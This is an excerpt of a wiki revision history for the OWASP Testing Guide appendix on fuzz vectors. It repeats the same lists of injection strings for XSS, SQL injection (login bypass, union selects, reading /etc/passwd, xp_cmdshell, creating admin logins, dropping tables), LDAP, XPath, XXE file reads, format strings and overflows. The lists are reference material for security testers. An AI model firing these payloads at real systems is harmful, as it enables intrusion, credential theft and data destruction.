&lt;nowiki&gt;(||6)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt; <br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select &lt;/nowiki&gt;<br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; <br /> @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;<br /> <br /> ==== Active SQL Injection (SQI) ====<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) <br /> + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;!&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(&lt;/nowiki&gt;<br /> &lt;nowiki&gt;)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%28&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%26&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%21&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(mail=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28mail%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(objectclass=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28objectclass%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'+or+''='&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+1=1+or+'x'='y&lt;/nowiki&gt;<br /> &lt;nowiki&gt;/&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;@*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;count(/child::node())&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+name()='username'+or+'x'='y&lt;/nowiki&gt;<br /> <br /> === XML Injection ===<br /> <br /> Details on XML Injection here: [[XML_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('gotcha');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foof&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file://c:/boot.ini&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/shadow&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///dev/random&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=14336 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-12-13T23:46:17Z <p>Subere: /* Format String Errors (FSE) */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replacive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replacive fuzzing ====<br /> <br /> Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> For details on XSS: [[Cross_site_scripting_AoC]]<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;<br /> alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;<br /> &amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058<br /> &amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt; <br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28<br /> &amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> <br /> === Buffer Overflows and Format String Errors ===<br /> <br /> ==== Buffer Overflows (BFO) ====<br /> A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.<br /> <br /> For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;<br /> <br /> ==== Format String Errors (FSE) ====<br /> <br /> Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;%s%p%x%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;.1024d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%.2049d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;<br /> <br /> ==== Integer Overflows (INT) ====<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;<br /> <br /> === SQL Injection ===<br /> <br /> For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]<br /> <br /> ==== Passive SQL Injection (SQP) ====<br /> <br /> &lt;nowiki&gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;||6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'||'6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(||6)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt; <br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select &lt;/nowiki&gt;<br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; <br /> @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;<br /> <br /> ==== Active SQL Injection (SQI) ====<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) <br /> + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;!&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(&lt;/nowiki&gt;<br /> &lt;nowiki&gt;)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%28&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%26&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%21&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(mail=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28mail%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(objectclass=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28objectclass%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'+or+''='&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+1=1+or+'x'='y&lt;/nowiki&gt;<br /> &lt;nowiki&gt;/&lt;/nowiki&gt;<br /> 